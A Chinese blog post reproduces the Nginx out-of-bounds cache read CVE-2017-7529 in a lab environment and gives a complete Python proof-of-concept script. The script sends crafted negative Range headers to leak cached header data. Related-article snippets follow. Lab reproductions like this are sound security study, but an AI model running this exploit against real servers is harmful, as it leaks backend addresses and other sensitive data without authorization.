Nginx越界读取缓存漏洞(CVE-2017-7529)

已于 2024-09-18 17:02:07 修改
阅读量895 收藏
点赞数 6
文章标签: 安全 web安全
于 2024-09-18 16:53:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_68177269/article/details/142309561
版权

漏洞原理:

影响版本内默认配置模块的Nginx只需要开启缓存,攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。

影响范围:

         Nginx 0.5.6 – 1.13.2

漏洞复现:

开启靶场,访问8080端口

中间件版本在影响范围内

使用poc验证漏洞:

#!/usr/bin/env python
import sys
import requests

if len(sys.argv) < 2:
    print("%s url" % (sys.argv[0]))
    print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
    sys.exit()

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
    n, 0x8000000000000000 - n)

r = requests.get(url, headers=headers)
print(r.text)

 

​​​​​​​

白8080
关注
CVE-2017-7529 Nginx越界读取缓存漏洞
alert['Hello World']
01-26 4461
目录漏洞描述影响版本漏洞环境搭建漏洞原理漏洞利用漏洞加固参考链接 漏洞描述   从0.5.6到1.13.2(含)的Nginx版本容易受到nginx范围过滤器模块中整数溢出漏洞的攻击,从而导致特制请求触发的潜在敏感信息泄漏。 影响版本 Nginx 0.5.6 – 1.13.2 漏洞环境搭建 使用docker 启动vulhub中的CVE-2017-7529环境 docker快速入门以及漏洞环境搭建 漏洞原理 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,
CVE-2017-7529Nginx 越界读取缓存漏洞
bring_coco的博客
06-09 748
一.漏洞原理 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括"文件头"+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的"HTTP返回包体"返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中
C++ IO类 详解
LxymticS的博客
12-23 1844
C++ IO类 详解 文章目录C++ IO类 详解1. 其实还有别的IO类1.1 特点:IO对象无拷贝或赋值1.2 管理流的条件状态1.3 管理输出缓冲1.3.1 为什么?1.3.2 那么,什么情况下缓冲会刷新呢1.3.3 主动刷新输出缓冲区:1.3.4 关联输入和输出流2. 文件IO2.1 打开文件2.1.1 打开文件的方法2.1.2 文件模式2.1.3 判断打开是否成功2.2 读取内容2.3 关闭文件3. string流3.1 什么时候使用呢? 1. 其实还有别的IO类 你,是不是每次写C++的第一行都
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将...
0x07 Nginx越界读取缓存漏洞 CVE-2017-7529 复现
最新发布
weixin_43263566的博客
09-12 756
表示“部分内容”(Partial Content),通常是在服务器处理了部分范围请求时返回的。我用这个poc遇到目标进行302重定向没有获取到目标信息,然后我又改了一下。
CVE-2017-7529Nginx越界读取缓存漏洞POC
weixin_45694388的博客
07-28 817
漏洞影响 低危,造成信息泄露,暴露真实ip等 实验内容 漏洞原理 通过查看patch确定问题是由于对http header中range域处理不当造成,焦点在ngx_http_range_parse 函数中的循环: HTTP头部range域的内容大约为Range: bytes=4096-8192bytes=-字符串指针p中即为“bytes=”后面的内容 这段代码是要把“-”两边的数字取出分别赋值给 start 和 end 变量标记读取文件的偏移和结束位置。 对于一般的页面文件这两个值怎么玩都没关系。但对于有
CVE-2017-7529 Nginx越界读取内存漏洞
mirocky的博客
10-13 927
CVE-2017-7529漏洞复现
nginx越界读取缓存漏洞CVE-2017-7529
u013008898的博客
02-12 866
主要是因为在通过range读取缓存的时候,当我们构造了两个负值得位置,则我们可以读取缓存文件中比敏感的服务器信息。Range: bytes=500- //表示从第 500 字节开始到文件结束部分的内容。Range: bytes=500-999 //表示第 500-999 字节范围的内容。Range: bytes=500-600,601-999 //同时指定几个范围。Range: bytes=-500 // 表示最后 500 字节的内容。在不影响业务的前提下,建议禁用multipart range功能。
Nginx越界读取缓存漏洞分析CVE-2017-7529
qq_43571759的博客
04-22 803
CVE-2017-7529 Nginx越界读取缓存漏洞 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 漏洞分析 如果我的请求中包含Range头,Nginx将会根据我指定的sta...
Apache RCE漏洞复现 CVE-2021-25646
m0_62284238的博客
09-09 485
Apache Druid 是一种开源的分布式实时分析(OLAP)数据库,能够快速地处理海量的数据,并支持在线聚合和深度查询。Apache Http Server是Apache软件基金会的一个开放源码的网页服务器。Alibaba Druid 是由阿里巴巴开源的一款分布式实时大数据查询和分析系统。进入vulnhub目录下的tomcat目录,进入CVE-2021-25646目录。出现Apache Druid界面即为开启成功!攻击者通过构造数据包中的json串来控制一些敏感参数。whoami执行成功!
CVE-2017-7529:Nginx敏感信息泄露
zhuchunyan_aijia的博客
01-22 1577
2017年7月11日,Nginx官方发布最新的安全公告,漏洞CVE编号为CVE-2017-7529,该在nginx范围过滤器中发现了一个安全问题,通过精心构造的恶意请求可能会导致整数溢出并且不正确处理范围,可能导致敏感信息泄漏,存在安全风险。 具体详情如下: 漏洞编号: CVE-2017-7529 漏洞名称: Nginx敏感信息泄露漏洞 官方评级: 中危 漏洞描述: 当使用nginx标准模块时,这允许攻击者如果从缓存返回响应,则获取缓存文件头,黑客可以通过缓存文件头获取包含IP地址的后端服
Nginx系列之整数溢出漏洞CVE-2017-7529
weixin_51692662的博客
08-16 2373
浅谈,代码,http,nginx,溢出漏洞
CVE-2017-7529 Nginx整数溢出漏洞自动化验证脚本
afei001
04-23 4082
欢迎关注公众号:网络运维渗透,一起学习交流。 目录 1.漏洞简述 2.POCsuite POC脚本 3.漏洞修复 1.漏洞简述 当使用Nginx标准模块时,攻击者可以通过发送包含恶意构造range域的header请求,来获取响应中的缓存文件头部信息。在某些配置中,缓存文件头可能包含后端服务器的IP地址或其它敏感信息,从而导致信息泄露。 CVECVE -CVE-2017-7529 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别...
漏洞nginx越界写入漏洞
07-28
很抱歉,但是我没有找到关于Nginx越界写入漏洞的相关信息。可能是因为该漏洞没有被广泛报道或者没有被命名为特定的CVE编号。如果您有更多的详细信息或者其他相关的引用内容,我可以尝试为您提供更准确的答案。 #### 引用[.reference_title] - *1* *3* [Nginx越界读取缓存漏洞CVE-2017-7529)](https://blog.youkuaiyun.com/qq_58000413/article/details/126944659)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Nginx目录穿越漏洞](https://blog.youkuaiyun.com/weixin_53284312/article/details/128273448)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值